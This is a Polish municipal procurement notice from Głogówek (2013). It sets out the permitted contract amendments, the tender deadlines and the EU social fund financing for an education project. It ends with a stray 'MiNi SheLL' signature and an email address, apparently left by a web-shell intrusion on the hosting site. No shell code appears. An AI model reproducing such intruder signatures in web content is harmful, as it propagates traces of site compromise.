<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W szczególności Zamawiający dopuszcza: 1.1 aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., 1.2 zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem ,że takiej zgody udzieli instytucja dofinansowująca i, że Zamawiający nie straci dofinansowania 1.3 jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia 2. Warunki dokonywania zmian: 2.1 inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego 2.2 uzasadnienie zmiany prawidłową realizacją przedmiotu umowy 2.3 zmiany umowy, o których mowa powyżej muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. 2010r. Nr 113, poz. 759 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ. 2.4 forma pisemna pod rygorem nieważności w formie aneksu do umowy 3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 4. Przyjęcie warunków niniejszego postępowania, tj. złożenie oferty jest jednoznaczne z przyjęciem istotnych warunków umowy proponowanych przez Zamawiającego. 5. W celu podpisania umowy uprawniony przedstawiciel Wykonawcy, którego oferta została wybrana, powinien zgłosić się do siedziby Zamawiającego w terminie podanym w zawiadomieniu o wyborze oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.glogowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogówku, ul. Rynek 1, 48-250 Głogówek..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2013 godzina 10:00, miejsce: Urząd Miejski w Głogówku, ul. Rynek 1, 48-250 Głogówek, I piętro, pokój nr 13-sekretariat...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego; realizowanym przez Gminę Głogówek w ramach PO KL, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com